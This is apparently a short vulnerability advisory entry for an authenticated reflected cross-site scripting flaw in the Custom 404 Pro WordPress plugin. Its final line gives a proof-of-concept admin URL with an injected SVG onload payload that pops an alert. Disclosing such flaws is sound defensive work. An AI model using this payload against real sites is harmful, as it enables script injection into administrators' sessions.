Custom 404 Pro < 3.2.9 - Authenticated Reflected XSS

2019-06-24T00:00:00
ID WPEX-ID:9382
Type wpexploit
Reporter
Modified 2020-09-22T07:28:35

Description

The Custom 404 Pro WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.

                                        
                                            Version <= 3.2.7: /wp-admin/admin.php?page=c4p-main&s="><svg/onload=alert(/XSS/)>